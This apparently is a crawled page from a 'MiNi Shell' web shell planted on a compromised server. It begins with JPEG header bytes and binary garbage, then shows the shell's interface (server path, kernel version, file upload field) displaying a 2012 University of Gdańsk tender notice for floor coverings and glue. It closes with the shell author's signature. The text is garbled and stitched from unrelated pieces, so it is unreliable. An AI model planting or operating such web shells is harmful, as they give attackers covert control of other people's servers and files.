JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121217/266329-N-2012.html

<p class="kh_header"><b>Gdańsk: Dostawa wykładzin podłogowych oraz kleju dla Uniwersytetu Gdańskiego</b><br>
<b>Numer ogłoszenia: 266329 - 2012; data zamieszczenia: 17.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wykładzin podłogowych oraz kleju dla Uniwersytetu Gdańskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  dostawa wykładzin podłogowych : PCV,  dywanowych        i kleju dla jednostek organizacyjnych Uniwersytetu Gdańskiego, zwanych                         w dalszej części  materiałami.
    Wspólny  słownik  zamówień  (CPV) : 44112200-0; 24910000-6.
    Szczegółowy  opis  materiałów  stanowi  załącznik  nr 2  (do SIWZ). 
2. Dostawa materiałów  transportem Wykonawcy wg  załącznika nr 2 (do SIWZ),  nastąpi  pod adresy  obiektów Uniwersytetu Gdańskiego na terenie Trójmiasta  z podanymi osobami odpowiedzialnymi za odbiór zamówienia:
  1)   Załącznik nr 2 poz. 1-3 Dział Administracji i Transportu UG do następujących obiektów      
         a) Zespół Obiektów Gdańsk, ul. Kładki 24, 80-822 Gdańsk   
             osoba odpowiedzialna za odbiór p. Anna Ihnatowicz                           
         b) Zespół Obiektów Wydziału Nauk Społecznych ul. Bażyńskiego 4, 80- 309 Gdańsk                                          
             osoba   odpowiedzialna za  odbiór  p. Andrzej Skowierzak 
         c) Zespół Obiektów Sopot, ul. Armii Krajowej 119/121, 81-824 Sopot                         
             osoba odpowiedzialna za odbiór p. Katarzyna Łappo     
   2)  Załącznik nr 2  poz. 4 -10 
         a) Samodzielna Grupa Remontowa  UG Dom Studenta nr 2  UG
             Gdańsk Wrzeszcz, ul Do Studzienki 34 pokój 123, osoby odpowiedzialne za odbiór          
             p. Małgorzata Malinowska, p. Damian Starosta 
   3) Załącznik nr 2 poz. 11- 13
           a) Dom Studenta nr 9 Sopot, ul. Bitwy pod Płowcami 64,  81-371 Sopot
              osoba odpowiedzialna za odbiór p. Krystyna Pokitko
   4) Załącznik nr 2 poz. 14 - 16
          a) Dom Studenta nr 3 Gdańsk, ul. Polanki  65,  80-306 Gdańsk Oliwa
              osoba odpowiedzialna za odbiór p. Bożena Zawadzka
   5)  Załącznik nr 2 poz.17 - 19
          a) Dom Studenta nr 4 Gdańsk, ul. Polanki  66,  80-306 Gdańsk Oliwa
              osoba odpowiedzialna za odbiór p. Elżbieta Filipczak
    Wykonawca skontaktuje  się  z  osobami   odpowiedzialnymi za  odbiór   zamówienia     
    w celu potwierdzenia  terminu dostawy.
3. Termin dostawy materiałów nie będzie  dłuższy niż 7 dni od dnia  zamówienia (poz. 4-10            
 z załącznika nr 2 dostawy sukcesywne), pozostałe pozycje z załącznika nr 2( poz. 1-3; 11-19) dostarczy w terminie do 28.02.2013r.              
4. Wykonawca poniesie koszty przewozu, przycięcia wykładziny na wymiar podany przez Zamawiającego przy sukcesywnych dostawach,
5.	Wykonawca zapewni rozładunek wraz z wniesieniem materiałów do miejsca wskazanego
    przez  Zamawiającego.
6.	Dostarczona  partia materiałów nie zostanie odebrana przez Zamawiającego w przypadku  
     stwierdzenia niezgodności z przedmiotem zamówienia.
7.	W razie stwierdzenia wad w odebranych materiałach Zamawiający złoży stosowną reklamację (pisemną) według § 6 projektu umowy do SIWZ.
8.	Wykonawca  udzieli  gwarancji na zaoferowane materiały (wykładziny) nie krótszej niż 24 miesiące od dnia podpisania faktury.
9. Gwarancja  będzie   obejmować   wszystkie  wykryte  podczas   eksploatacji  wady  oraz    
     uszkodzenia  powstałe  w  czasie poprawnego, zgodnego z przeznaczeniem użytkowania 
     przy czym Wykonawca może zaproponować czas gwarancji dłuższy.
10.Zamawiający wymaga aby oferowane  materiały  w celu zachowania   odpowiednich 
     parametrów  i  standardów jakościowych, były   takie, jak  wymienione  w  załączniku nr 2.
11.Wszystkie  dostarczone  w  ramach  złożonej   oferty   materiały   winny   spełniać   warunki określone w (PN), (PN - EN).                                                                                                                 
12.Materiały(wykładziny) posiadają  stosowny atest higieniczny, deklarację zgodności potwierdzającą właściwości w zakresie niepalności, antystatyczności lub certyfikaty w zakresie bezpieczeństwa  i dopuszczenia do obrotu handlowego.
13.Materiały (kleje) posiadają aprobatę techniczną Instytutu Techniki Budowlanej.
14.Dostarczona  partia materiałów nie zostanie odebrana przez Zamawiającego w przypadku  
     stwierdzenia niezgodności z przedmiotem zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.11.22.00-0, 24.91.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
     spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
     spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
     spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
     spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
     spełnianie  Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie o podwykonawcach - Wykonawca wykonujący zamówienie  wyłącznie siłami własnymi   nie dołącza do oferty załącznika nr 6 (do SIWZ).   
2) Zaakceptowany   przez  Wykonawcę  projekt  umowy - załącznik nr 5 do SIWZ,       Wykonawca  może  też  zastosować  się  do   informacji   zawartej  w  rozdz.  XVI  pkt  1.
3)  W  celu  potwierdzenia, że oferowane dostawy   odpowiadają wymaganiom określonym  
     przez Zamawiającego, Zamawiający żąda :dołączenia do  oferty specyfikacji  technicznej 
     oferowanych materiałów, pochodzącej od producenta  lub potwierdzonej przez  
     producenta. Parametry równoważne muszą być zaznaczone bardzo czytelnie (np. inny kolor czcionki). Zamawiający dopuszcza wydruki ze stron internetowych producenta- podpisany, przez osob(ę)y   upoważnion(ą)e do składania oświadczeń woli w imieniu Wykonawcy.  

    W   przypadku   Wykonawców   ubiegających   się   wspólnie   o    udzielenie  zamówienia,   
    Wykonawcy Ci składają łącznie dokumenty, o których mowa w pkt. 3  rozdziału V  SIWZ.

4.  Wykonawcy mający siedzibę lub miejsce zamieszkania za granicą:
1)	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
Zamiast dokumentów  wymienionych  w  rozdziale V pkt. 2 ppkt.  2),3),4), składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)  nie otwarto jego  likwidacji ani nie ogłoszono upadłości,
                 b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne        i zdrowotne albo że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.        
2)	Dokumenty, o których mowa w pkt. 1 ppkt. a), powinny być wystawione nie wcześniej 
niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty , o których mowa      w pkt. 1 ppkt. b), powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

5. Informacje dotyczące składania dokumentów.

1) Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniami          na język polski, poświadczonymi za zgodność z oryginałem przez Wykonawcę. Wykonawca, według swojego uznania może też przedstawić tłumaczenie dokonane przez tłumacza przysięgłego, które nie wymaga poświadczenia za zgodność.
2) Dokumenty mają być składane w formie oryginału lub kserokopii poświadczonej                    za zgodność z oryginałem przez Wykonawcę (osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy zgodnie z wpisem w stosownym dokumencie uprawniającym     do wystąpienia w obrocie prawnym) lub notariusza.
   3) Dokumenty muszą być wystawione zgodnie z terminami określonymi powyżej, przy czym ważny będzie również dokument wystawiony w okresie wcześniejszym, jeżeli zostanie potwierdzony przez organ wydający w wymaganym terminie.
4) Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa   w art. 25 ust.1 ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału   w postępowaniu nie później niż w dniu, w którym  upłynął termin składania ofert - art. 26 ust. 3 ustawy.
5) Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy  nie wykażą spełnienia warunków udziału w postępowaniu. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
6) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w trybie art. 23
     ust. 1-4 ustawy, w tym w ramach konsorcjum.
7) W przypadku  opisanym  w  ppkt. 6)  Wykonawcy   ustanawiają   pełnomocnika                            do  reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania   w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
8)	Jeżeli oferta Wykonawców, o których mowa w ppkt 6), została wybrana, Zamawiający żąda aby przed zawarciem umowy Wykonawcy Ci przedłożyli umowę regulującą ich współpracę (art. 23 ust.4 ustawy).
9)	 W przypadku, gdy Wykonawcę reprezentuje pełnomocnik (można wystawić jednorazowe          
     pełnomocnictwo do danego konkretnego postępowania), do oferty musi być załączone           
     pełnomocnictwo (o ile pełnomocnictwo dla osób reprezentujących Wykonawcę nie wynika 
     z dokumentów rejestracyjnych) zawierające datę wystawienia, zakres upoważnienia, okres na które zostało wystawione oraz podpisane przez osoby uprawnione   do reprezentacji. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez osoby udzielające pełnomocnictwa lub notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotna  zmiana  postanowień  umowy  dopuszczalna   jest w następujących przypadkach:
      1)  zmiany terminu realizacji umowy  z przyczyn  leżących po stronie Zamawiającego (sytuacja ekonomiczna, zdolności płatnicze lub warunki organizacyjne czy też z przyczyn technicznych) lub zmiany te są korzystne dla Zamawiającego, 
       2)  zaistnienia siły wyższej,
       3)  zmiany obowiązujących przepisów prawa,
       4)  zmiany  stawek   podatku  VAT, ( zmianie  ulegną  ceny   jednostkowe      
             brutto, bez   zmiany   wartości   brutto   umowy   określonej   w  §  3 ust. 3  projektu      
            umowy załącznik nr 5 do SIWZ).
Zamawiający może odstąpić od umowy:
1)	 Zamawiający może odstąpić od umowy, jeśli wykonanie umowy nie leży w interesie publicznym, zgodnie z art. 145 ustawy.  W tym wypadku,  Zamawiający może odstąpić od umowy w terminie  30 dni  od powzięcia wiadomości   o tych  okolicznościach.
2)	 W wypadku określonym w pkt. 1 Wykonawca może żądać jedynie  wynagrodzenia należnego  mu z tytułu  wykonania części umowy.
3)	Zamawiający może również odstąpić od umowy na zasadach określonych           w pkt.1 i 2 niniejszego ustępu , w wypadku ogłoszenia upadłości lub likwidacji przedsiębiorstwa Wykonawcy, wydania  nakazu zajęcia majątku Wykonawcy.
4)	Zamawiający może odstąpić od umowy w trybie natychmiastowym w przypadku, gdy dostawa jest realizowana wadliwie lub sprzecznie z umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rektorat Uniwersytetu Gdańskiego, 80-952 Gdańsk, ul. Bażyńskiego 1 A pokój 124.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2013 godzina 11:00, miejsce: Rektorat Uniwersytetu Gdańskiego, 80-952 Gdańsk, ul. Bażyńskiego 1 A pokój 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający nie dopuszcza możliwości składania ofert częściowych.
2.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
3.	Zamawiający nie zamierza zawrzeć umowy ramowej, jak i ustanowienia dynamicznego   
     systemu zakupów.
4.	Zamawiający nie zamierza dokonać wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej .
5.	Zamawiający  dopuszcza  możliwość  składania  ofert   równoważnych.( nie gorszych    jakościowo niż proponowane przez Zamawiającego).
6.	Jeżeli Wykonawca proponuje materiał równoważny musi  skreślić  (nie jest wymagane    parafowanie skreśleń) materiał  określony  przez Zamawiającego  i  wpisać  w  załącznik  nr 2  - rubryka 2 - odpowiednio  do pozycji, proponowany materiał  równoważny  z dokładną nazwą produktu z podaniem producenta, oraz dokładnym  opisem parametrów (gramatura,  grubość, gramatura runa, odporność na wygniatanie, zachowanie antystatyczne )  oraz  opis  składu  i  zastosowania  w  przypadku  kleju.
7.	Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać (rozdział V pkt. 3 ppkt 3), że oferowane przez niego materiały  spełniają  wymagania  określone  przez  Zamawiającego tj. opis parametrów  ( gramatura,  grubość , gramatura runa ,odporność na wygniatanie, zachowanie antystatyczne ) oraz opis składu  i zastosowania w przypadku kleju. 
8.	Zamawiający  nie  dopuszcza  możliwości  dokonania  przedpłaty. 
9.	Koszty opracowania i dostarczenia oferty oraz uczestnictwa w przetargu obciążają  
wyłącznie Wykonawcę.        
10.	Zamawiający udostępnia SIWZ na stronie internetowej www.ug.edu.pl;  od dnia  
zamieszczenia  publikacji w Biuletynie Zamówień Publicznych do upływu terminu 
składania ofert.
11.	SIWZ w formie papierowej na wniosek Wykonawcy przekazuje się odpłatnie (10 groszy    
     za stronę+ koszty przesyłki - listem poleconym za zwrotnym potwierdzeniem odbioru) -   
     art. 42  ust. 2 ustawy.
12.	Zamawiający   w  szczególnie  uzasadnionych przypadkach może w każdym  czasie,  
 przed upływem terminu do składania ofert, zmienić treść SIWZ. Dokonaną  zmianę  
 Zamawiający  przekazuje   niezwłocznie  wszystkim  Wykonawcom,  którym  przekazano  
     SIWZ oraz zamieści na stronie internetowej Zamawiającego.
13.	Jeżeli zmiana treści SIWZ prowadzi do zmiany treści ogłoszenia o zamówieniu, 
Zamawiający zamieszcza ogłoszenie o zmianie  ogłoszenia w Biuletynie Zamówień   
     Publicznych.
14.	Jeżeli w wyniku zmiany treści SIWZ nieprowadzącej do zmiany treści ogłoszenia               o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian  w ofertach,  
Zamawiający przedłuży termin składania ofert. O przedłużeniu terminu składania 
ofert Zamawiający niezwłocznie zamieści informację na stronie internetowej 
Zamawiającego - art. 38 ust. 6 ustawy.
15.	Zgodnie z zapisem art. 8 ustawy oraz regulacją ustawy o dostępie do informacji    
      publicznej   postępowanie o udzielenie zamówienia publicznego jest jawne. Zamawiający 
      może    ograniczyć   dostęp    do    informacji   związanych    z    postępowaniem   tylko                      
      w przypadkach  określonych w ustawie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com